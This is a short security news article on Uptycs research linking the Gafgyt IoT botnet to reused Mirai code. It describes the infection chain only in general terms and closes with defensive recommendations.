Researchers at security analytics firm Uptycs have identified a set of similar attack methodologies used in a dangerous botnet that was also used in the infamous Mirai. The botnet is Gafgyt, first discovered in 2014 (two years before Mirai). The Linux-based IoT botnet primarily targets any vulnerable IoT devices, especially Huawei routers, Realtek routers, and ASUS devices, according to the Uptycs blog post.
Uptycs identified five specific areas of Gafgyt’s attack that copy the same code that Mirai used. These areas are HTTP flooding, UDP flooding, TCP flooding, STD module, and Telnet Bruteforce. In each case, researchers were able to draw the connection from Gafgyt to Mirai using threat intelligence systems and their “in-house osquery-based sandbox.”
Gafgyt functions by first attacking a vulnerable target device, then downloading a malicious payload. Post-infection, Gafgyt contacts various IP addresses to fetch the payload. The process typically goes like this:
- wget command is executed which calls for the payload.
- chmod command is given which tells the payload to execute.
- Payload begins working inside the target device.
- Once the attack is complete and the device belongs to the Gafgyt botnet, payload is removed.
Much of Mirai’s source code is readily available, and considering it was arguably the most dangerous botnet in history, it makes sense that other threat actors will utilize its code. The Uptycs’ blog post says as much, along with giving defense tips, in the following excerpt:
Malware authors may not always innovate, and researchers often discover that malware authors copy and re-use leaked malware source code. In order to identify and protect against these kinds of malware attacks, we recommend the following measures:
- Regularly monitor the suspicious processes, events, and network traffic spawned on the execution of any untrusted binary.
- Keep systems and firmware updated with the latest releases and patches.
Botnets rely on vulnerable systems to operate. The less open to attack a target is, the less likely it will be successfully attacked.
Featured image: Flickr/Steven Lilley